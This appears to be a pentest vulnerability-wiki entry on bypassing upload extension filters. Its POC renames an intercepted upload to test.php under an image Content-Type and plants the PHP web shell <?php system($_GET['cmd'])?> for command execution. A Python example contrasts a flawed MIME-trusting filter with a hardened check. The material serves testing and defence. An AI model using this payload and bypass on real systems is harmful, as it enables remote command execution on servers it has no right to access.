Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V11 - Business Logic

Unrestricted File Upload - File Extension Filter Bypass

POC

  • Upload a legitimate image file (for example test.php.jpg) through the application's upload feature
  • Intercept the request with Burp
  • In the multipart file part, change filename="test.php.jpg" to filename="test.php"
  • Keep the Content-Type: image/jpeg header unchanged, so a filter that only trusts the declared MIME type still accepts the file
  • Replace the file body with <?php system($_GET['cmd'])?>
  • Locate the URL where the uploaded file is served and append ?cmd=ls; if the response contains a directory listing, the server executed the file as PHP and the bypass leads to command execution
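The following is an added example, not code from the Cobalt wiki or from any target application. It models the upload as the server sees it, builds the multipart part that Burp would show for the POC above, and places the filter the POC defeats (one that trusts the client's Content-Type) beside a hardened check that takes the last extension only, verifies the file's leading bytes, and stores the file under a server-generated name. The extension allowlist, MIME list, JPEG stub and web-shell payload are constructed for the example and are assumptions, not values from the page.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Extensions the hypothetical application wants to accept (assumption for this example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
ALLOWED_MIME_TYPES = {"image/jpeg", "image/png", "image/gif"}

# Leading bytes of the image formats above, used to check what a file really is.
MAGIC_BYTES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Constructed sample payloads (not real captures).
WEBSHELL = b"<?php system($_GET['cmd'])?>"
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"  # minimal JPEG/JFIF header


@dataclass
class Upload:
    """One file part of a multipart/form-data request, as the server sees it."""
    filename: str      # client-supplied, attacker-controlled
    content_type: str  # client-supplied, attacker-controlled
    data: bytes


def build_multipart(upload: Upload, field: str = "file", boundary: str = "----cobalt") -> bytes:
    """Encode the part as a multipart/form-data body, i.e. the bytes an
    interceptor such as Burp shows and lets you edit before forwarding."""
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{upload.filename}"\r\n'
        f"Content-Type: {upload.content_type}\r\n\r\n"
    ).encode() + upload.data + f"\r\n--{boundary}--\r\n".encode()


def vulnerable_accepts(upload: Upload) -> bool:
    """The filter the POC bypasses: it trusts the client-declared MIME type
    and never looks at the extension or the bytes.  Renaming test.php.jpg
    to test.php while keeping Content-Type: image/jpeg sails through."""
    return upload.content_type in ALLOWED_MIME_TYPES


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in MAGIC_BYTES.items():
        if data.startswith(magic):
            return kind
    return None


def hardened_store_name(upload: Upload) -> Optional[str]:
    """Hardened check.  Returns the name to store the file under, or None to
    reject.  The stored name is generated server-side from the sniffed type,
    so neither the client's filename nor its Content-Type reaches disk."""
    # Strip any directory component (also defeats ../ tricks) and take the
    # *last* extension only; test.php.jpg therefore yields "jpg".
    base = os.path.basename(upload.filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        return None                      # test.php is rejected here
    sniffed = sniff_image_type(upload.data)
    if sniffed is None:
        return None                      # a PHP script claiming to be a JPEG
    if ext != sniffed and {ext, sniffed} != {"jpg", "jpeg"}:
        return None                      # extension and content disagree
    # Random hex name: the attacker's "php" substring never appears on disk,
    # so Apache-style AddHandler rules that match ".php" anywhere in the
    # name have nothing to match.
    return f"{secrets.token_hex(16)}.{sniffed}"


if __name__ == "__main__":
    shell = Upload("test.php", "image/jpeg", WEBSHELL)
    print(build_multipart(shell).decode(errors="replace"))
    print("vulnerable filter accepts web shell:", vulnerable_accepts(shell))
    print("hardened filter stores web shell as:", hardened_store_name(shell))
    print("hardened filter stores real JPEG as:",
          hardened_store_name(Upload("photo.jpg", "image/jpeg", JPEG_STUB)))
```

Two caveats when reading the hardened check. First, an extension allowlist on its own is not enough: with Apache's AddHandler directive a name such as test.php.jpg can still be handed to the PHP handler, which is why the example discards the client's name entirely. Second, even a correctly validated image should be served from a location where script execution is disabled (or from a separate host or object store), since a polyglot file that is both a valid image and a PHP script passes the magic-byte check. When confirming the issue on a live target, use a harmless command such as ls, as the POC does.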

Impact

Low-Medium

Likelihood

Low-Medium